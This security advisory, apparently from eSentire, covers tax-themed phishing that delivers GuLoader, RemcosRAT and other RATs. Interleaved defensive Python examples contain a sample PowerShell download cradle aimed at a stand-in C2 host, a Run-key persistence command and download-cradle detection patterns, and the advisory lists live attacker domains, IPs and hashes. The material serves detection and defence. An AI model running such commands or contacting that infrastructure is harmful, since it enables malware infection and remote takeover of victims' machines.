Increase in Tax-Themed Email Lure

THE THREAT

As the U.S. and Canadian tax season approaches, eSentire has observed a substantial increase in malware being delivered through tax-themed phishing emails. Cybercriminals are exploiting the urgency and importance of tax-related communications to trick individuals into opening malicious email links, leading to malware infections.

The observed phishing campaigns utilize tax-themed lures, including tax documents, tax returns, and IRS letters. These emails often appear to be sent from legitimate tax authorities or financial institutions and include malicious links leading to malware payloads hosted on attacker-controlled infrastructure.

eSentire has observed the following malware families being delivered from tax-themed campaigns: GuLoader (which in turn loads RemcosRAT), XWorm, RattyRat, and SorillusRAT. These malware families provide threat actors with a variety of functionalities including keylogging, taking screenshots, audio and webcam recording, file transfer, and remote code execution.

With the increasing sophistication of tax-themed phishing campaigns, it is crucial that organizations implement proactive email security measures and educate users, to minimize the risk of malware infections and protect sensitive information during the tax season and throughout the calendar year.

What we’re doing about it

  • eSentire MDR for Network has rules in place to identify GuLoader, RemcosRAT, XWorm, RattyRat, and SorillusRAT
  • eSentire MDR for Endpoint has a wide array of rules in place to detect malicious activity associated with these threats
  • BlueSteel, via eSentire MDR for Endpoint, identifies malicious PowerShell activity
  • Known malicious IP addresses are blocked via the eSentire Global Block list
  • eSentire’s Threat Response Unit released a TRU Positive blog detailing the Ratty RAT and Sorillus RAT infections
  • The eSentire Threat Intelligence team is actively tracking related threats for additional details and detection opportunities

What you should do about it

  • Individuals and organizations should be vigilant when receiving unsolicited emails or messages related to taxes
    • Train users to identify and report potentially malicious content using Phishing and Security Awareness Training (PSAT) programs
    • Review the example of a malicious email included below (Figure 1)
  • Protect endpoints against malware by:
    • If not required for a business function, blocking password-protected ZIP archives at the email boundary
    • If not required for a business function, blocking .jar file attachments in email and blocking emails with .jar in URLs
    • Removing Java from systems where it is not required
    • Creating a new “Open With” parameter for .jar files so they open with notepad.exe
      • This setting is found in the Group Policy Management Console under User Configuration > Preferences > Control Panel Settings > Folder Options
      • Applying this to other script files (.js, .jse, .hta, .vbs) is also recommended for most users to limit the risk of click-to-execute content
  • Enforce the use of Multi-Factor Authentication (MFA) to limit the value of stolen credentials
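As an added example, not eSentire's code or any product's rule set, the following Python sketches the email-boundary checks the list above describes: it flags .jar attachments, password-protected ZIP archives, archives carrying click-to-execute members (.lnk, .jar, .js, .jse, .hta, .vbs), and .jar links in URLs. The extension sets, function names and the sample archives are assumptions constructed for illustration; the "password-protected" sample only sets the ZIP encryption flag bit, its content is plain text.

```python
import io
import zipfile
from urllib.parse import urlparse

# Added example (not eSentire code): an email-boundary attachment policy that follows the
# advisory's recommendations. The extension sets below are assumptions for a policy
# where neither .jar files nor password-protected archives serve a business function.
BLOCKED_ATTACHMENT_EXT = {".jar"}
CLICK_TO_RUN_EXT = {".jar", ".lnk", ".js", ".jse", ".hta", ".vbs"}
ZIP_ENCRYPTED_FLAG = 0x1  # general-purpose bit 0 in a ZIP member header


def file_ext(name: str) -> str:
    """Lower-cased final extension of a file name or archive member path ('' if none)."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base[base.rfind("."):] if "." in base else ""


def evaluate_attachment(filename: str, data: bytes) -> list[str]:
    """Return the policy reasons to block an attachment; an empty list means allow."""
    reasons = []
    ext = file_ext(filename)
    if ext in BLOCKED_ATTACHMENT_EXT:
        reasons.append(f"attachment extension {ext} is blocked")
    # ZIP-based containers (.zip, .jar, ...) are inspected from their directory only,
    # so an encrypted archive can be judged without a password and nothing is extracted.
    if data.startswith(b"PK\x03\x04"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                members = zf.infolist()
                if any(m.flag_bits & ZIP_ENCRYPTED_FLAG for m in members):
                    reasons.append("password-protected archive")
                risky = sorted({file_ext(m.filename) for m in members} & CLICK_TO_RUN_EXT)
                if risky:
                    reasons.append("archive contains click-to-run content: " + ", ".join(risky))
        except zipfile.BadZipFile:
            reasons.append("malformed ZIP archive")
    return reasons


def url_has_blocked_extension(url: str) -> bool:
    """True when the URL path ends in a blocked extension (the '.jar in URLs' rule)."""
    return file_ext(urlparse(url).path) in BLOCKED_ATTACHMENT_EXT


def build_sample_zip(members: dict[str, bytes], encrypted: bool = False) -> bytes:
    """Constructed test data. With encrypted=True the 'encrypted' flag bit is set in every
    local file header (flags at byte 6) and central directory entry (flags at byte 8),
    which is how a password-protected archive advertises itself; the data stays plain."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    raw = bytearray(buf.getvalue())
    if encrypted:
        for sig, offset in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            pos = raw.find(sig)
            while pos != -1:
                raw[pos + offset] |= ZIP_ENCRYPTED_FLAG
                pos = raw.find(sig, pos + len(sig))
    return bytes(raw)


# Constructed samples: a lure archive shaped like the one in Figure 1 (a .lnk inside a
# password-protected ZIP), a benign archive, and a minimal .jar. All content is placeholder text.
SAMPLE_LURE_ZIP = build_sample_zip({"Tax_Return_2023.pdf.lnk": b"placeholder, not a real LNK"}, encrypted=True)
SAMPLE_BENIGN_ZIP = build_sample_zip({"invoice.pdf": b"%PDF-1.4 placeholder"})
SAMPLE_JAR = build_sample_zip({"META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n"})

if __name__ == "__main__":
    for name, blob in [("Tax_Return_2023.zip", SAMPLE_LURE_ZIP),
                       ("invoice.zip", SAMPLE_BENIGN_ZIP),
                       ("Tax_documents.jar", SAMPLE_JAR)]:
        print(name, "->", evaluate_attachment(name, blob) or "allow")
```

The archive check reads only the central directory, so it works on password-protected archives whose contents cannot be scanned by content-based filters, which is exactly why the advisory recommends blocking them outright where no business function needs them.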

Additional information

GuLoader is a sophisticated malware loader which heavily abused tax-themed lures in 2023. eSentire’s Threat Response Unit reported on GuLoader around tax season last year, in both April and June of 2023. Starting in early March 2024, eSentire has observed an increase in GuLoader incidents resulting in the deployment of the RemcosRAT malware. In observed incidents, users received tax-themed malicious emails containing a link to a password-protected ZIP archive that impersonates a tax return (Figure 1). The ZIP archive contains an LNK file which, if opened, leads to the deployment of GuLoader. GuLoader then executes PowerShell commands, establishes persistence via Registry Run Keys, and ultimately injects the RemcosRAT payload into the memory of a legitimate process (Figure 2). If not detected and remediated quickly, these incidents lead to information theft and enable remote control over the victim device.

RemcosRAT, XWorm, RattyRat, and SorillusRAT are all Remote Access Trojans offering various information stealing and remote access capabilities, including keylogging, capturing screenshots, recording audio, transferring files, and remotely controlling target machines.

In a recently observed incident involving XWorm malware, a user was identified downloading a malicious JavaScript file impersonating a tax document; the user had been directed to the download page by a malicious email. Upon execution, a PowerShell command was spawned to retrieve the XWorm payload from its Command-and-Control (C2) server. Subsequent JavaScript and PowerShell commands were blocked by the client’s endpoint agent, preventing further malicious actions (Figure 3).
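The two process chains described above (GuLoader in Figure 2, XWorm in Figure 3) share a shape that can be written as detection logic over process-creation events: a script host launched from Explorer on a file in a user-writable directory, PowerShell spawned by that script host, a PowerShell download cradle, and Registry Run Key persistence. The following Python is an added example, not eSentire's detection content or BlueSteel: the rule names, the event layout and every sample event (paths, the placeholder encoded command, the example.invalid host) are assumptions constructed for illustration.

```python
import re

# Added example (not eSentire code): rules over process-creation events shaped like
# {"pid", "ppid", "image", "cmdline"}, the fields a Sysmon-style process log provides.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# A script file (.vbs/.js/...) under a user-writable directory on the command line.
SCRIPT_IN_USER_DIR = re.compile(r'\\(Downloads|Temp|AppData)\\[^"]*\.(vbs|vbe|js|jse|hta)\b', re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(events: list[dict]) -> list[tuple[str, int]]:
    """Return (rule_name, pid) findings for every event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_image = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        # Click-to-execute content: Explorer hands a script in Downloads/Temp/AppData to a script host.
        if image in SCRIPT_HOSTS and parent_image == "explorer.exe" and SCRIPT_IN_USER_DIR.search(cmd):
            findings.append(("click_to_run_script", e["pid"]))
        # PowerShell started by a script host, as in both the GuLoader and XWorm chains.
        if image in SHELLS and parent_image in SCRIPT_HOSTS:
            findings.append(("script_host_spawned_powershell", e["pid"]))
        # PowerShell fetching a payload from a remote server.
        if image in SHELLS and DOWNLOAD_CRADLE.search(cmd):
            findings.append(("powershell_download_cradle", e["pid"]))
        # Persistence via a Registry Run key written by reg.exe or PowerShell.
        if (image == "reg.exe" or image in SHELLS) and RUN_KEY.search(cmd):
            findings.append(("run_key_persistence", e["pid"]))
    return findings


def process_chain(events: list[dict], pid: int) -> list[str]:
    """Ancestry of a flagged pid, root first, for analyst triage."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


# Constructed events resembling the GuLoader chain in Figure 2 (the encoded command is a placeholder).
GULOADER_LIKE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\jdoe\Downloads\Tax_Return_2023\Tax_Return.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc PLACEHOLDER_BASE64"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Users\jdoe\AppData\Roaming\updater.vbs"'},
]

# Constructed events resembling the XWorm chain in Figure 3 (example.invalid is a placeholder host).
XWORM_LIKE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 210, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\jdoe\Downloads\Tax_Document.js"'},
    {"pid": 310, "ppid": 210, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c \"(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/atom.xml')\""},
]

# Constructed benign activity: an admin script run from Explorer and a vendor logon script.
BENIGN_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Program Files\Vendor\logon.vbs"'},
]

if __name__ == "__main__":
    for name, events in [("GuLoader-like", GULOADER_LIKE_EVENTS), ("XWorm-like", XWORM_LIKE_EVENTS), ("benign", BENIGN_EVENTS)]:
        for rule, pid in analyse(events):
            print(f"{name}: {rule} pid={pid} chain={' -> '.join(process_chain(events, pid))}")
```

Each rule on its own is a low-to-medium confidence signal (administrators do run scripts and reg.exe); the value comes from several of them firing along one parent chain, which is what `process_chain` exposes for correlation.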

For additional technical details relating to recent observations of Ratty Rat and Sorillus RAT, delivered via tax-related lures, see the eSentire TRU Positive blog post Beware the Bait: Java RATs Lurking in Tax Scam Emails, published on February 26th, 2024.

Indicators of Compromise
Indicator | Type
intuitfrauddept[.]com | Phishing Email Domain
intermountaiinhealthcare[.]org | Phishing Email Domain
goatratedman[.]com | Phishing Email Domain
stsebss[.]org | Phishing Email Domain
hxxps[://]trivolibolit[.]com/wp-content/Hpzion[.]png | GuLoader Payload Hosting URL
hxxps[://]jantickee[.]com/wp-content/Stanles2[.]png | GuLoader Payload Hosting URL
hxxps[://]gamonosa[.]sa[.]com/.well-known/kr/UvcZuvTnzIO46.bin | GuLoader Payload Hosting URL
AA55DC4FBEE738D2EAA714E6136C4E0CE8E3EF99C74F4D764F0BE3B790CE8014 | GuLoader LNK File
63902401F26CBA19F48EBBE0B4C24BE0E2209686E0001009A5878EF0C57415CD | GuLoader LNK File
FE10BC87167AA524D762E3BD9D7F38F53AE39A8515C28DFFC68B03229235B2A3 | GuLoader VBS File
558742072F2E71418380FEBD4462A3C5B6CCF83160F385DF2D3799AA78EC58C2 | GuLoader VBS File
EE23C722FD3A20CC9189903F7715AC6DA2EF2F5CAE0D8C23487CAC1FBC37A1D4 | GuLoader VBS File
zarusouyt2994hesut01[.]duckdns[.]org | Remcos C2
zarusouyt2994hesut02[.]duckdns[.]org | Remcos C2
1shanamubunz[.]com | Remcos C2
shakaojafun[.]com | Remcos C2
85.209.176[.]69 | Remcos C2
hxxp[://]91[.]92[.]243[.]28/////////poom///////////////////////////////////atom[.]xml | XWorm Payload Hosting URL
91.92.243[.]28 | XWorm C2
1C56940B0234BF7BEAC519CB62BD0DBE1E1B96B6F7AAB7F7FFBC7CC253EF5D5E | XWorm JavaScript File
hxxps[://]sahiomn[.]web[.]app/Tax_documents_PDF[.]zip | SorillusRAT Hosting
hxxps[://]osaminc[.]web[.]app/2023-FILES-MY1040-w2-IRS-letter-1099r_PDF[.]zip | RattyRAT Hosting
216FFBB3057F8765E2DD73FDAD6E43ECB5D22821423B8824E23BE03A7692E5AD | Sorillus RAT ZIP archive
FA4723B6970601FB772E808FA142008649773FD281BE46455C69828C0421AE27 | Sorillus RAT JAR File
FB420FBABBD1BB240D07D01B3841943D457B9CCC0F019E4B7B80973D8A282D57 | RattyRAT JAR File
185.196.220[.]62 | RattyRAT C2 & SorillusRAT C2
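As an added example, not eSentire's tooling, the following Python parses an indicator table in which each line carries a defanged indicator and its type separated by a pipe, using the same defanging conventions as the list above (hxxp for http, [://] for ://, [.] for .). It refangs each value, classifies it as a domain, URL, IP address or SHA-256 hash, and groups the results into the lists a DNS/proxy block, a firewall rule or an EDR hash list would consume. The sample rows are constructed placeholders (reserved .invalid names, documentation IP space, a dummy hash), not the advisory's indicators.

```python
import ipaddress
import re

# Added example (not eSentire code): ingest a defanged "indicator | type" table.
SHA256_RE = re.compile(r"^[0-9a-f]{64}$", re.I)


def refang(indicator: str) -> str:
    """Undo the defanging used in the table: hxxp -> http, [://] -> ://, [.] -> ."""
    value = indicator.strip()
    value = re.sub(r"^hxxp", "http", value, flags=re.I)
    return value.replace("[://]", "://").replace("[.]", ".")


def classify(value: str) -> str:
    """Kind of a refanged indicator; hashes and URLs are tested before the IP/domain fallback."""
    if SHA256_RE.match(value):
        return "sha256"
    if "://" in value:
        return "url"
    try:
        ipaddress.ip_address(value)
        return "ip"
    except ValueError:
        return "domain"


def parse_ioc_table(text: str) -> list[dict]:
    """Parse pipe-separated 'indicator | type' lines; the header row and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        if "|" not in line:
            continue
        raw, context = (part.strip() for part in line.split("|", 1))
        if raw.lower() == "indicator":
            continue
        value = refang(raw)
        rows.append({"raw": raw, "value": value, "kind": classify(value), "context": context})
    return rows


def blocklists(rows: list[dict]) -> dict[str, list[str]]:
    """Group refanged values by kind: domains for DNS/proxy blocking, URLs for the web proxy,
    IPs for the firewall, SHA-256 hashes for the EDR custom hash list."""
    grouped: dict[str, list[str]] = {}
    for row in rows:
        grouped.setdefault(row["kind"], []).append(row["value"])
    return grouped


# Constructed sample rows in the advisory's defanged layout (placeholder values only).
SAMPLE_TABLE = "\n".join([
    "Indicator | Type",
    "phish-sender[.]invalid | Phishing Email Domain",
    "hxxps[://]payload-host[.]invalid/wp-content/sample[.]png | Loader Payload Hosting URL",
    "hxxp[://]203[.]0[.]113[.]10/////////atom[.]xml | Payload Hosting URL",
    "203.0.113[.]10 | C2",
    "ab" * 32 + " | Loader LNK File",
])

if __name__ == "__main__":
    for kind, values in blocklists(parse_ioc_table(SAMPLE_TABLE)).items():
        print(kind, values)
```

Classification order matters: a hash is checked first because it can never be mistaken for a name, and the URL test precedes the IP test so that a URL whose host is a bare IP (like the XWorm hosting URL above) lands in the URL list rather than being rejected as an invalid address.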
Figure 1: Tax-Themed GuLoader Email
Figure 2: Process Tree for GuLoader leading to RemcosRAT
Figure 3: XWorm Process Tree Resulting in Blocked Execution

https://www.esentire.com/security-advisories/increase-in-tax-themed-email-lure